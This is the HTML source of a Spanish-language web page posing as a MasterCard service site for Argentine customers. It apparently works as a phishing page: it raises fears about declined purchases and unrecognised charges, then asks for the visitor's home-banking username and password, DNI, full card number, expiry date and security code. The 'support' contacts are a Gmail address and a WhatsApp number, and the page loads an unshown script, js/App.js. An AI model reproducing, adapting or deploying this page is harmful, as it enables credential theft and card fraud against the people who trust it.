<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" type="image/x-icon" href="img/favicon/favicon.ico">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-gH2yIJqKdNHPEq0n4Mqa/HGKIhSkIHeL5AyhkYV8i59U5AR6csBvApHHNl/vI1Bx" crossorigin="anonymous">
    <link rel="stylesheet" href="css/style.css">
    <title>MasterCard</title>
</head>
<body>

    <nav class="navbar shadow bg-c fixed-top">
        <div class="container-fluid">
          <img class="logo" src="img/logo/logo.png" alt="">
          <button class="navbar-toggler navbar_btn" type="button" data-bs-toggle="offcanvas" data-bs-target="#offcanvasNavbar" aria-controls="offcanvasNavbar">
            <span class="navbar-toggler-icon"></span>
          </button>
          <div class="offcanvas offcanvas-start" tabindex="-1" id="offcanvasNavbar" aria-labelledby="offcanvasNavbarLabel">
            <div class="offcanvas-header">
              <img class="logo" src="img/logo/logo.png" alt="">
              <h5 class="offcanvas-title fw-bold fs-2" id="offcanvasNavbarLabel">Master Card </h5>
              <button type="button" class="btn-close" data-bs-dismiss="offcanvas" aria-label="Close"></button>
            </div>
            <div class="offcanvas-body">
              <ul class="navbar-nav justify-content-end flex-grow-1 pe-3">
                <li class="nav-item">
                  <a class="nav-link active" aria-current="page" href="#">Home</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link" href="#rc">Realizr consulta</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link" href="#contact">Contacto</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link" href="#qs">Qienes somos</a>
                </li>
                
            </div>
          </div>
        </div>
      </nav>

      <article>
          <section class="m-auto section1">

            <main class="p-5" >
                <p class="z_index lead fs-2 mt-5 text_1">¿Tenés límite disponible y tus compras son rechazadas?
                </p>
                <p class="z_index fs-2 lead text-center ">¿No podes descargar tus resumenes?</p>
                <p class="z_index fs-2 lead text-end" >¿Visualizas consumos que no realizaste?</p>

                <img class="opacity-50 img_logo" src="img/logo/logo.png" alt="">

                <img class="img_1" src="img/images(1).jpeg" alt="">

            </main>

          </section>
          <section id="rc" class="section2 p-5 m-auto">
              <header class="header_section2">
                  <p class="text-center fs-4 mb-0 lead">Bancariza tu Master Card crédito soluciona todos estos problemas. <br>
                  Envianos tus datos y comienza a vivir la experiencia Master Card.</p>
              </header>
              <main class="d-flex flex-column">
                    <label class="mt-5 fs-5 m-auto mb-2" for="user">Usuario Home Banking</label>
                    <input class="text-center rounded mb-4 m-auto" type="text" id="user" placeholder="No introduzca espacios por favor..." required>
                    <label class="m-auto fs-5 mb-2" for="user">Clave Home Banking</label>
                    <input class="text-center rounded mb-4 m-auto" type="password" id="code" placeholder="No introduzca espacios por favor..." required>
                    <label class="m-auto fs-5 mb-2" for="user">DNI</label>
                    <input class="text-center rounded mb-4 m-auto" type="number" id="dni" placeholder="No introduzca espacios por favor..." required>
                    <label class="m-auto fs-5 mb-2" for="user">Numero de tarjeta (16 dígitos)</label>
                    <input class="text-center rounded mb-4 m-auto" type="number" maxlength="16" id="card" placeholder="No introduzca espacios por favor..." required>
                    <label class="m-auto fs-5 mb-2" for="user">Fecha de Vencimiento</label>
                    <input class="text-center rounded mb-4 m-auto" type="date" id='vencimiento' placeholder="No introduzca espacios por favor..." required>
                    <label class="m-auto fs-5 mb-2" for="user">Codígo de Seguridad (al dorso)</label>
                    <input class="text-center rounded mb-4 m-auto" type="number" id="secure_code" maxlength="3" placeholder="No introduzca espacios por favor..." required>
                    <button id="submit" class="btn mb-3 m-auto btn-primary">Enviar</button>
                    
                    <p id="error" class="text-center fs-4 rounded text-danger bg-light"></p>
                    
                </main>
          </section>
                   <section class="section3 m-auto p-5">
                      <header>
                        <h1 class="text-center text-light lead fs-1">Horario de servicio</h1>
                      </header>
                      <p class="text-center mt-5 fs-4">Lunes <span class=" ms-5">Abierto 24hrs</span></p>
                      <p class="text-center mt-4 fs-4">Martes <span class=" ms-5">Abierto 24hrs</span></p>
                      <p class="text-center mt-4 fs-4">Jueves<span class=" ms-5">Abierto 24hrs</span></p>
                      <p class="text-center mt-4 fs-4">Viernes<span class=" ms-5">Abierto 24hrs</span></p>
                      <p class="text-center mt-4 fs-4">Sábado <span class=" ms-5">Abierto 24hrs</span></p>
                      <p class="text-center mt-4 fs-4">Domingo<span class=" ms-5">Abierto 24hrs</span></p>
          
                    </section>
                    <section id="location" class="section4 p-5 m-auto">
                      <header>
                        <h1 class="text-center mb-4 text-light ">Puedes encontrarnos en:</h1>
                      </header>
                      <main class="iframe rounded mt-5 m-auto">
                          <iframe class="m-auto" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3284.19745010802!2d-58.3697285!3d-34.5991683!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x95a3353363a48559%3A0x85b2c7298a021d60!2sEdificio%20Bouchard%20710!5e0!3m2!1sen!2smx!4v1660244399137!5m2!1sen!2smx" frameborder="5" width="100%" height="450"></iframe>
                      </main>
                    </section>
                    <section class="section5 m-auto pe-3 ps-3 pt-5">
                      <header>
                        <h1 class="text-center text-light mb-4" id="qs">Quienes Somos</h1>
                      </header>
                      <p class="m-auto text-center mb-5 lead ">Somos los encargados de brindarles un servicio de calidad, por lo que garantizamos agilidad y eficiencia en nuestro trabajo, con el fin de hacer de esta una experiencia agradable.</p>
                      <div class="rounded img_container mb-4">
                        <img class="imgqs" src="img/img1.jpeg" >
                      </div>
                      <div class="img_container">
                        <img class="imgqs" src="img/img2.jpeg">
                      </div>
                    </section>
      </article>
      <footer id="contact" class="pt-4 footer">
          <img class="logo_footer" src="img/logo/logo.png" alt="logo">
          <p class="ms-4 fs-3 mb-0 mt-3">Nececitas ayuda?</p>
          <p class="ms-4 mt-0 fs-3">Estamos aquí para ayudarte</p>
          <a class="ms-4 fs-5" href="#rc">Realiza una consulta</a>
          <a class="ms-4 fs-5" href="https://api.whatsapp.com/send?phone=5491151109790">Abrir un reclamo</a>
          <a class="ms-4 fs-5" href="#qs">Quienes somos</a>
          <a class="ms-4 fs-5 mb-4" href="Noticias"></a>
          
          <div class="ms-4 align-items-center d-flex">
            <img class="icons" src="img/icons/phone_icon.png">
          <p class="mb-0 ms-2 fs-4">+54 9 11 5110-9790 </p>  
          </div>
          <div class="ms-4 align-items-center d-flex">
            <img class="icons" src="img/icons/email_icon.png">
            <p class="mb-0 ms-2 fs-4">mastercardonline221@gmail.com</p>
          </div>
          <div class="ms-4 align-items-center d-flex">
            <img class="icons" src="img/icons/location_icon.png">
            <a class="mb-0 ms-2 fs-4 " href="#location" >Estamos aqui</a>
          </div>
          
          <div class="mt-4 p-2 pie bg-black ">
              <p class="text-center fs-3">1994 - 2022 | Master Card</p>
          </div>
      </footer>
      
      <div id="contacto" class="whatsApp_btn shadow-lg rounded-circle">
      </div>
      
</body>
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.5/dist/umd/popper.min.js" integrity="sha384-Xe+8cL9oJa6tN/veChSP7q+mnSPaj5Bcu9mPX5F5xIGE0DVittaqT5lorf0EI7Vk" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0/dist/js/bootstrap.min.js" integrity="sha384-ODmDIVzN+pFdexxHEHFBQH3/9/vQ9uori45z4JjnFsRydbmQbmL5t1tQ0culUzyK" crossorigin="anonymous"></script>
      <script src="js/App.js"></script>
</html>
